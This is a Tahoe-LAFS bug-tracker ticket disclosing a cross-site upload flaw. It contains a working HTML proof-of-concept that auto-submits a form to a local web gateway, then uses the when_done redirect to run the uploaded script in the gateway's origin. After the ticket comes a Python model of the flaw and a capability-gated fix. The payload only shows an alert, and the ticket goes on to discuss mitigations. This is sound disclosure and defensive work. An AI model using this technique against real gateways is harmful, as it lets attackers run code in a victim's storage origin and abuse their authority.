[tahoe-lafs-trac-stream] [tahoe-lafs] #1859: Proof-of-concept attack: Upload and execute attacker controlled js from any domain.

tahoe-lafs trac at tahoe-lafs.org
Thu Jul 4 18:13:33 UTC 2013


#1859: Proof-of-concept attack: Upload and execute attacker controlled js from any domain.
-------------------------+-------------------------------------------------
     Reporter:           |      Owner:  davidsarah
  nejucomo               |     Status:  new
         Type:  defect   |  Milestone:  undecided
     Priority:  major    |    Version:  1.9.2
    Component:  code-    |   Keywords:  security javascript same-origin
  frontend-web           |  capleak
   Resolution:           |
Launchpad Bug:           |
-------------------------+-------------------------------------------------

New description:

 **Proof of Concept Attack**

 The following proof of concept shows how an html file loaded from any
 domain into (some) browsers with javascript enabled can inject an attacker
 controlled script into a grid, and //then// cause the user to execute that
 script in the domain of the grid:

 {{{
 <html>
 <head>
 <script>

 var PAYLOAD = '\x3chtml\x3e\x3chead\x3e\x3cscript\x3e' +
   'alert("OH NOES! WHY ATTACKER CODE IN MAI DOMAIN " + document.domain + "?!")' +
   '\x3c/script\x3e\x3c/head\x3e\x3c/html\x3e';

 window.onload = function () {
   var payload_input = document.getElementById('payload_input');
   payload_input.value = PAYLOAD

   var the_form = document.getElementById('the_form');
   the_form.submit();
 }

 </script>
 </head>

 <body id="body">

 <p>
 demo attack:
 </p>

 <p>
 This page attempts to inject an attacker controlled script into a <a
 href="https://tahoe-lafs.org">tahoe-lafs</a> grid, no matter which domain
 this file is loaded from.
 </p>

 <form id="the_form"
       method="POST"
 action="http://127.0.0.1:3456/uri?t=upload&when_done=/uri/%25(uri)s?filename=payload.html"
       enctype="multipart/form-data"
       >
 <input id="payload_input" type="text" name="file"></input>
 </form>

 </body>
 </html>
 }}}

 **Mitigations**:

 There are several moving parts at work here.  The {{{when_done}}}
 parameter with uri substitution was very convenient.

 I think an upload capability would be the most consistent and thorough
 solution.  Removing bits and pieces which may otherwise be useful, like
 {{{when_done}}}, feels like a piecemeal defense.

 Requiring CSRF tokens may be more comprehensive, but also doesn't sit well
 with the rest of the capability model.  (A CSRF token would be a bit like
 a "make this kind of http request" temporary capability.)

 **Related Tickets**:

 * #615 is about illicitly gaining victim capabilities; whereas this ticket
 is about bootstrapping an attack and/or abusing ambient authority.
 * #1215 is about adding CORS support and how that may create a
 vulnerability; this script demonstrates even without CORS support similar
 vulnerabilities already exist.

--

Comment (by nejucomo):

 This is related to:

 * #587 "Web nodes provide ambient upload authority"
 * The accounting proposal - https://tahoe-lafs.org/trac/tahoe-lafs/browser/docs/proposed/accounting-overview.txt
   * Note: So long as the web interface requires an explicit, non-ambient
     authority for space usage, this attack vector will be less useful.
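As an added illustration, not code from the ticket or from Tahoe-LAFS, here is a small Python model of the two pieces the description and the comment above point at: the gateway's ambient upload authority (#587) and the when_done URI substitution that turns a cross-origin upload into a same-origin load of the uploaded file. FAKE_FILECAP, VALID_UPLOAD_CAPS and both handler functions are constructed stand-ins for the gateway, not its real code; ACTION is the form target from the proof of concept.

```python
from urllib.parse import urlsplit, parse_qs

# Constructed placeholder for the cap the gateway hands back for a fresh
# upload; it is not a real Tahoe-LAFS capability string.
FAKE_FILECAP = "URI:CHK:constructedexamplecap"

# Hypothetical explicit upload authority (the "upload capability" the ticket
# proposes); only requests that present one of these may write to the grid.
VALID_UPLOAD_CAPS = {"URI:UPLOADCAP:constructed-secret"}

# The form action from the ticket's proof of concept (%25 is an encoded '%').
ACTION = ("http://127.0.0.1:3456/uri?t=upload"
          "&when_done=/uri/%25(uri)s?filename=payload.html")


def parse_gateway_request(url):
    """Return (path, query dict) as the gateway sees the POST target."""
    parts = urlsplit(url)
    return parts.path, {k: v[0] for k, v in parse_qs(parts.query).items()}


def ambient_upload(url, body):
    """Model of the current behaviour: the POST needs no authority, and
    when_done's %(uri)s is filled with the new cap and used as a redirect,
    so the browser next fetches the uploaded content from the gateway's
    own origin."""
    path, query = parse_gateway_request(url)
    if path != "/uri" or query.get("t") != "upload":
        return 400, None
    filecap = FAKE_FILECAP  # stands in for storing `body` in the grid
    when_done = query.get("when_done")
    if when_done is not None:
        return 302, when_done % {"uri": filecap}
    return 200, filecap


def capability_gated_upload(url, body, upload_cap=None):
    """Model of the proposed fix: the upload itself demands a non-ambient
    authority, so a cross-origin page that lacks it is refused before any
    data lands in the grid or any when_done redirect is issued."""
    if upload_cap not in VALID_UPLOAD_CAPS:
        return 403, None
    return ambient_upload(url, body)
```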

-- 
Ticket URL: <https://tahoe-lafs.org/trac/tahoe-lafs/ticket/1859#comment:9>
tahoe-lafs <https://tahoe-lafs.org>
secure decentralized storage